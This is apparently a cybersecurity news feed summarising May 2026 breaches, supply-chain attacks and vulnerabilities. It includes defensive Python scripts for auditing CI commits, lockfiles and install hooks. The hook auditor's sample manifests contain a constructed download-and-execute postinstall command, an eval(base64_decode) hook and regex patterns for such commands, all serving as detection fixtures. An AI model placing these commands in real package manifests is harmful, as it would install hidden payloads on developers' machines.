⚡ Not via a fancy zero-day... #GitHub confirmed its internal repositories were breached after an employee device installed a poisoned Nx Console VS Code extension.
https://thehackernews.com/2026/05/github-internal-repositories-breached.html
TeamPCP exfiltrated ~3,800 repos in an 18-minute window.
The extension's auto-update channel delivered a credential stealer targeting 1Password, GitHub tokens, AWS credentials, and more.
[New] 9-Year-Old Linux Kernel Bug = Local Root on Default Debian, Ubuntu & Fedora.
https://thehackernews.com/2026/05/9-year-old-linux-kernel-flaw-enables.html
CVE-2026-46333 (ssh-keysign-pwn) lets any unprivileged user steal /etc/shadow + SSH host keys and run commands as root.
🔸 Public PoC available
🔸 Patch your kernel NOW
🔸 Quick temp fix: sysctl -w kernel.yama.ptrace_scope=2 (this restricts ptrace to processes with CAP_SYS_PTRACE, so unprivileged debugger attach stops working until you revert it; put the same line in /etc/sysctl.d/ if it must survive a reboot)
🚨 Microsoft warns two Defender vulnerabilities are being actively exploited in the wild.
https://thehackernews.com/2026/05/microsoft-warns-of-two-actively.html
🔸 CVE-2026-41091: local privilege escalation to SYSTEM.
🔸 CVE-2026-45498: denial of service against Defender.
CISA added both to KEV with a June 3, 2026 patch deadline.
🚨 ThreatsDay Bulletin – May 21, 2026 is LIVE!
🔥 47 zero-days
🤖 AI agents gone rogue
🐧 Old Linux rootkit still alive
...and 25 more fresh threats
Attackers are weaponizing the tools we trust.
Read full bulletin: https://thehackernews.com/2026/05/threatsday-bulletin-linux-rootkits.html
A single cached AWS key, auto-stored after a normal login on one Windows machine. No misconfig. No policy violation.
Yet it could open a path to 98% of the company's cloud entities.
Identity isn't the perimeter. It's the highway attackers use once inside.
Must-read: https://thehackernews.com/2026/05/when-identity-is-attack-path.html
🔥 Limited special offers
15K SOC teams and 600K security professionals worldwide trust ANY.RUN's enterprise-grade threat analysis and intelligence to close critical malware & phishing gaps and cut MTTR.
Get your offer today ➡️ https://thn.news/anyrun-tg-plan-offer
🚨 Showboat #Linux malware targets Middle East telecom.
https://thehackernews.com/2026/05/showboat-linux-malware-hits-middle-east.html
Active since at least mid-2022, the modular framework provides remote shells, file transfer, process hiding, and SOCKS5 proxying that lets operators pivot into internal LAN systems.
🚨 Critical Alert: Cisco Secure Workload Hit with CVSS 10.0 Flaw.
https://thehackernews.com/2026/05/cisco-patches-cvss-100-secure-workload.html
Unauthenticated attackers can exploit a REST API vulnerability (CVE-2026-20223) to steal sensitive data and make configuration changes across tenant boundaries with Site Admin privileges.
Affects both SaaS and on-prem deployments. No workarounds.
Patch immediately:
• 3.10 → 3.10.8.3
• 4.0 → 4.0.3.17
• 3.9 or older → Migrate now
🚨 CISA just added two actively exploited vulns to its KEV catalog.
https://thehackernews.com/2026/05/cisa-adds-exploited-langflow-and-trend.html
Critical RCE in Langflow (CVE-2025-34291, CVSS 9.4) and directory traversal in Trend Micro Apex One (on-prem).
Patch now if you're using either.
A 23-year-old Canadian man has been arrested over the alleged operation of Kimwolf, a #DDoS botnet that infected photo frames, webcams, and other devices.
The botnet issued 25,000+ attack commands and peaked at 31.4 Tbps.
Full story 👉 https://thehackernews.com/2026/05/kimwolf-ddos-botnet-operator-arrested.html
Many vulnerable Windows drivers were written off as 'safe' because their vulnerable code paths were assumed to run only when the matching hardware is present.
New research shows you can often trigger them from user mode alone, no hardware needed.
That makes far more drivers practical for BYOVD attacks (e.g. killing EDRs).
Details → https://thehackernews.com/2026/05/making-vulnerable-drivers-exploitable.html
⚡ Megalodon pushed malicious CI/CD workflows to 5,561 #GitHub repos in 6 hours.
https://thehackernews.com/2026/05/megalodon-github-attack-targets-5561.html
Attackers used throwaway accounts and forged CI bot names to inject GitHub Actions payloads designed to steal CI secrets, cloud credentials, SSH keys, OIDC tokens, and source code secrets.
Check recent workflow changes, audit PATs/deploy keys, and review unexpected CI bot commits.
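One way to do the "review unexpected CI bot commits" step from the post above, as an added example that is not the article's or GitHub's code. Real GitHub App bots commit from an address of the form <app user id>+<login>@users.noreply.github.com, so a commit whose author name looks like a bot but whose e-mail does not fit that pattern (or carries the wrong id) is worth reading before anything else. The git log excerpt, the commit hashes and the e-mail addresses in it are constructed for illustration; the bot user ids are assumed from GitHub's public user records and should be re-checked via the API before you rely on them.

```python
"""Flag recent commits that changed GitHub Actions workflow files under a
forged CI-bot identity. Added example; sample log is constructed."""
import re
from dataclasses import dataclass, field

# Produce matching input from a repository with:
#   git log --since=7.days --pretty=format:'%H|%an|%ae' --name-only
# (one header line per commit, then the touched paths, commits separated by a blank line)
SAMPLE_LOG = """\
a1b2c3d|github-actions[bot]|41898282+github-actions[bot]@users.noreply.github.com
.github/workflows/release.yml

d4e5f6a|github-actions[bot]|github-actions@ci-mail.example
.github/workflows/ci.yml
.github/workflows/deploy.yml

0f1e2d3|dependabot[bot]|49699333+dependabot[bot]@users.noreply.github.com
package-lock.json

9c8b7a6|jane.doe|jane@example.com
.github/workflows/lint.yml
"""

# Assumed known-good ids for the two most common bots (GitHub's public user
# records); verify any bot you add with GET https://api.github.com/users/<login>.
KNOWN_BOT_IDS = {"github-actions[bot]": "41898282", "dependabot[bot]": "49699333"}
NOREPLY_RE = re.compile(r"^(\d+)\+(.+)@users\.noreply\.github\.com$")
WORKFLOW_DIR = ".github/workflows/"


@dataclass
class Commit:
    sha: str
    author: str
    email: str
    files: list = field(default_factory=list)


def parse_log(text: str) -> list:
    """Split `git log --name-only` output into Commit records."""
    commits = []
    for block in text.strip().split("\n\n"):
        header, *files = block.splitlines()
        sha, author, email = header.split("|", 2)
        commits.append(Commit(sha, author, email, [f for f in files if f]))
    return commits


def bot_identity_forged(c: Commit) -> bool:
    """True when the author name claims to be a GitHub App bot but the e-mail is
    not that bot's noreply address (wrong domain, wrong login, or wrong user id)."""
    if not c.author.endswith("[bot]"):
        return False
    m = NOREPLY_RE.match(c.email)
    if m is None:
        return True
    uid, login = m.groups()
    expected = KNOWN_BOT_IDS.get(c.author)
    return login != c.author or (expected is not None and uid != expected)


def workflow_commits(text: str) -> list:
    """All commits that touched a workflow file; every one of these deserves a read."""
    return [c for c in parse_log(text)
            if any(f.startswith(WORKFLOW_DIR) for f in c.files)]


def suspicious_workflow_commits(text: str) -> list:
    """SHAs of workflow-touching commits made under a forged bot identity."""
    return [c.sha for c in workflow_commits(text) if bot_identity_forged(c)]


if __name__ == "__main__":
    for c in workflow_commits(SAMPLE_LOG):
        flag = "FORGED BOT" if bot_identity_forged(c) else "review"
        print(f"{flag:10} {c.sha} {c.author} <{c.email}> {', '.join(c.files)}")
```

Git author fields are self-asserted, so this only catches sloppy forgeries: an attacker who copies the exact noreply address passes. Treat the output as a triage list, and rely on required reviews, branch protection on .github/workflows/ and verified commit signatures as the actual control.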
Ghostwriter is phishing Ukraine's government with Prometheus-themed malware lures.
https://thehackernews.com/2026/05/ghostwriter-targets-ukraine-government.html
Emails sent from compromised accounts deliver PDF links that lead to ZIP-packaged JavaScript malware: OYSTERFRESH → OYSTERBLUES/OYSTERSHUCK.
Cobalt Strike is assessed as the final payload.
🚨 First VPN, a criminal VPN used by at least 25 ransomware groups, has been dismantled.
https://thehackernews.com/2026/05/first-vpn-dismantled-in-global-takedown.html
Authorities say the service helped criminals hide the origin of ransomware attacks, data theft, scanning, fraud, and DDoS activity.
The May 19–20 operation seized 33 servers and domains, including 1vpns[.]com, 1vpns[.]net, and 1vpns[.]org.
🚨 Drupal Core SQL injection is now actively exploited.
https://thehackernews.com/2026/05/drupal-core-sql-injection-bug-actively.html
CISA added CVE-2026-9082 to its KEV catalog after exploitation was detected in the wild.
Imperva observed:
• 15,000+ attack attempts
• Nearly 6,000 targeted sites
• Activity across 65 countries
• Gaming and financial services sites hit hardest, at nearly 50% of attacks
The flaw affects all supported Drupal Core versions and could allow privilege escalation and remote code execution via specially crafted requests.
Patch now:
• Drupal 11.3.10, 11.2.12, 11.1.10, 10.6.9, 10.5.10, 10.4.10
• Drupal 9.5 and 8.9 require manual patching.
🚨 Active exploit: LiteSpeed cPanel root flaw.
https://thehackernews.com/2026/05/litespeed-cpanel-plugin-cve-2026-48172.html
CVE-2026-48172 is a CVSS 10.0 vulnerability in the LiteSpeed User-End cPanel Plugin that lets any cPanel user run arbitrary scripts as root.
🔸 Affected: v2.3–2.4.4
🔸 Not affected: WHM plugin
🔸 Fix: upgrade to WHM Plugin 5.3.1.0 with cPanel plugin v2.4.7+
🔸 IOC: requests carrying cpanel_jsonapi_func=redisAble
Supply Chain Attack Alert: 700+ Laravel-Lang package versions compromised.
https://thehackernews.com/2026/05/laravel-lang-php-packages-compromised.html
The malicious code auto-runs via Composer, drops a cross-platform PHP stealer, and targets cloud keys, CI/CD tokens, browser data, crypto wallets, password managers, SSH keys, and .env files.
Laravel/PHP devs: check your composer.lock immediately.
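A concrete version of "check your composer.lock", as an added example that is not the article's or Laravel-Lang's code: inventory every package from one vendor (prod and dev sections) and call out the entries that get code executed without anyone calling into them, namely composer-plugin packages, which run inside Composer itself, and packages that declare autoload.files, which are included on every load of vendor/autoload.php. It also notes dist archives fetched from a host other than the usual ones. The lockfile fragment is constructed; its versions and URLs are placeholders, not the compromised releases, and the expected-host list is this example's assumption.

```python
"""Triage one vendor's packages in a composer.lock for auto-executing entries.
Added example; the sample lockfile is constructed."""
import json
from urllib.parse import urlparse

SAMPLE_LOCK = json.dumps({
    "packages": [
        {"name": "laravel-lang/lang", "version": "0.0.1-example", "type": "library",
         "autoload": {"psr-4": {"LaravelLang\\Lang\\": "src/"}},
         "dist": {"type": "zip", "url": "https://api.github.com/repos/Laravel-Lang/lang/zipball/0000"}},
        {"name": "laravel-lang/publisher", "version": "0.0.2-example", "type": "library",
         "autoload": {"psr-4": {"LaravelLang\\Publisher\\": "src/"}, "files": ["src/helpers.php"]},
         "dist": {"type": "zip", "url": "https://api.github.com/repos/Laravel-Lang/publisher/zipball/0000"}},
        {"name": "monolog/monolog", "version": "0.0.3-example", "type": "library",
         "autoload": {"psr-4": {"Monolog\\": "src/Monolog"}},
         "dist": {"type": "zip", "url": "https://api.github.com/repos/Seldaek/monolog/zipball/0000"}},
    ],
    "packages-dev": [
        {"name": "laravel-lang/attributes", "version": "0.0.4-example", "type": "composer-plugin",
         "autoload": {"psr-4": {"LaravelLang\\Attributes\\": "src/"}},
         "dist": {"type": "zip", "url": "https://example.invalid/attributes.zip"}},
    ],
})

# Hosts a Packagist-resolved dist archive normally comes from (assumption for
# this example); anything else is unusual enough to diff the lockfile.
EXPECTED_DIST_HOSTS = {"api.github.com", "codeload.github.com", "gitlab.com", "bitbucket.org"}


def vendor_packages(lock_text: str, vendor: str) -> list:
    """(section, entry) for every package whose name starts with '<vendor>/'."""
    lock = json.loads(lock_text)
    prefix = vendor.rstrip("/") + "/"
    found = []
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            if pkg.get("name", "").startswith(prefix):
                found.append((section, pkg))
    return found


def review_reasons(pkg: dict) -> list:
    """Why this entry deserves a read: it runs code on its own, or comes from an odd host."""
    reasons = []
    if pkg.get("type") == "composer-plugin":
        reasons.append("composer-plugin (runs inside Composer itself)")
    files = (pkg.get("autoload") or {}).get("files") or []
    if files:
        reasons.append("autoload.files: " + ", ".join(files))
    host = urlparse((pkg.get("dist") or {}).get("url", "")).hostname or ""
    if host and host not in EXPECTED_DIST_HOSTS:
        reasons.append(f"dist host {host} is not an expected source")
    return reasons


def triage(lock_text: str, vendor: str) -> list:
    """(name, version, section, reasons) per vendor package, entries with findings first."""
    rows = [(pkg["name"], pkg["version"], section, review_reasons(pkg))
            for section, pkg in vendor_packages(lock_text, vendor)]
    return sorted(rows, key=lambda r: (not r[3], r[0]))


if __name__ == "__main__":
    for name, version, section, reasons in triage(SAMPLE_LOCK, "laravel-lang"):
        print(f"{name}@{version} [{section}]:", "; ".join(reasons) or "nothing auto-executes")
```

Point it at the real file with triage(open("composer.lock").read(), "laravel-lang"), compare every listed version against the advisory, and diff the lockfile against a known-good commit. autoload.files is legitimate for plenty of packages (helper functions), so the output is a reading list, not a verdict.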
🚨 Anthropic's Claude Mythos Preview found 10,000+ severe software flaws in one month.
https://thehackernews.com/2026/05/claude-mythos-ai-finds-10000-high.html
Of the findings across widely used software, 1,726 have been confirmed as real flaws so far and 1,094 are rated high or critical severity.
The findings have already led to 97 patches and 88 advisories.
One flaw, CVE-2026-5194 in wolfSSL, could allow certificate forgery.
⚠️ Supply chain attack hits Packagist.
https://thehackernews.com/2026/05/packagist-supply-chain-attack-infects-8.html
8 packages were compromised with malicious package.json postinstall scripts that downloaded and executed a Linux binary from GitHub Releases.
The payload was also linked to 777 GitHub files, including GitHub Actions workflow files.
Audit your dependencies and lockfiles.
🔥 npm now requires human 2FA approval before staged package releases become installable, even when the upload comes from a CI/CD workflow.
https://thehackernews.com/2026/05/npm-adds-2fa-gated-publishing-and.html
New package versions uploaded with staged publishing are placed into a queue and must be explicitly approved by a maintainer before release.
Requirements:
• npm CLI 11.15.0+
• 2FA enabled
• Existing npm package
• Use npm stage publish
npm also added new install controls:
--allow-file
--allow-remote
--allow-directory
The updates are designed to strengthen defenses against software supply chain attacks targeting open-source ecosystems.
🚨 TrapDoor supply chain attack hits npm, PyPI, and crates.io.
https://thehackernews.com/2026/05/trapdoor-supply-chain-attack-spreads.html
34 malicious packages across 384 versions were used to steal crypto wallets, SSH keys, cloud credentials, and developer secrets from crypto, DeFi, Solana, and AI environments.
The malware abused npm lifecycle hooks, Python import-time execution, and Rust build scripts (build.rs) for execution and persistence.
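The Packagist post above describes package.json postinstall scripts that pull a binary from GitHub Releases and run it, and the TrapDoor post describes the same trick through npm lifecycle hooks. Here is a check for that execution path, as an added example that is not the code of either article or of any project they name: it walks the install-time hooks of an npm package.json or a Composer composer.json and flags commands that look like download-and-execute (fetching a URL, piping into an interpreter, pulling a GitHub Release asset, marking a file executable, decoding base64, running inline code). The two manifests, the hook names treated as auto-running and the regex list are this example's own assumptions.

```python
"""Flag install-time lifecycle hooks in npm/Composer manifests that look like
download-and-execute. Added example; manifests are constructed."""
import json
import re

# Hooks the package manager runs on its own during install/update.
NPM_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}
COMPOSER_HOOKS = {"pre-install-cmd", "post-install-cmd", "pre-update-cmd", "post-update-cmd",
                  "pre-autoload-dump", "post-autoload-dump", "post-package-install"}

# Heuristics, in the order their reasons are reported.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b.*https?://"), "downloads from a URL"),
    (re.compile(r"\|\s*(sh|bash|zsh|node|php|python3?)\b"), "pipes into an interpreter"),
    (re.compile(r"github\.com/\S+/releases/download/"), "fetches a GitHub Release asset"),
    (re.compile(r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b"), "marks a file executable"),
    (re.compile(r"\bbase64\b.*(-d\b|--decode)|\batob\(|\bbase64_decode\("), "decodes base64"),
    (re.compile(r"\b(node|php)\s+-[er]\s"), "runs inline code"),
]

SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-widget", "version": "1.2.3",
    "scripts": {
        "build": "tsc -p .",
        "prepare": "husky install",
        "postinstall": "curl -sL https://github.com/example/agent/releases/download/v1.0/agent-linux "
                       "-o /tmp/.agent && chmod +x /tmp/.agent && /tmp/.agent &",
    },
})

SAMPLE_COMPOSER_JSON = json.dumps({
    "name": "example/plugin", "type": "library",
    "scripts": {
        "post-update-cmd": ["@php artisan package:discover --ansi"],
        "post-install-cmd": ["php -r \"eval(base64_decode('ZWNobyAx'));\"",
                             "@php artisan vendor:publish"],
        "test": "phpunit",
    },
})


def hook_commands(manifest: dict, hooks: set):
    """Yield (hook, command) for every script the package manager runs unprompted.
    Composer allows a list of commands per hook; npm allows a single string."""
    for name, cmd in (manifest.get("scripts") or {}).items():
        if name in hooks:
            for c in (cmd if isinstance(cmd, list) else [cmd]):
                yield name, str(c)


def audit_manifest(text: str, kind: str) -> list:
    """(hook, reasons) pairs for hooks whose command matches a download-and-execute pattern.
    kind is "npm" or "composer"."""
    hooks = NPM_HOOKS if kind == "npm" else COMPOSER_HOOKS
    findings = []
    for name, cmd in hook_commands(json.loads(text), hooks):
        reasons = [why for rx, why in SUSPICIOUS if rx.search(cmd)]
        if reasons:
            findings.append((name, "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    for label, text, kind in (("package.json", SAMPLE_PACKAGE_JSON, "npm"),
                              ("composer.json", SAMPLE_COMPOSER_JSON, "composer")):
        for hook, reasons in audit_manifest(text, kind):
            print(f"{label}: {hook} -> {reasons}")
```

Run it over every node_modules/*/package.json and vendor/*/composer.json after a fresh resolve; npm install --ignore-scripts and composer install --no-scripts keep the hooks from firing while you look. TrapDoor's other two paths, Python import-time code and Rust build.rs, are not manifest scripts and need a separate read of the new packages' __init__.py and build.rs files.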